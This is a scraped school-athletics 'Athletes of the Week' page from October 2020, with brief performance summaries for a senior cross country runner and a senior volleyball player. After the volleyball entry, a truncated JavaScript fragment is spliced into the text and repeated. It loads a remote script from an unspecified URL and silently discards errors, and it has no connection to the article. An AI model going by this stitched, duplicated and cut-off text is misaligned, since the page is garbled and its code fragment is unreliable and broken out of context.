Athletes of the Week

Kemba Credit Union Athletes of the Week 10/12/2020-10/18/2020

Zach Beneteau
Senior, Cross Country

Zach let the team to a GMC title, and took on the overall top spot finishing with the time of 15:33.7. Zach was also named GMC Runner of the Year.

 

 

 

 

 

 

Sydney Hilderbrand
Senior, Girls Volleyball

Sydney had 23 kills, only 3 errors on only 42 attempts (.476 hitting %).  She had 10 digs.  She also finished off the match with aces on points 23, 24 and 25 in set 4

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts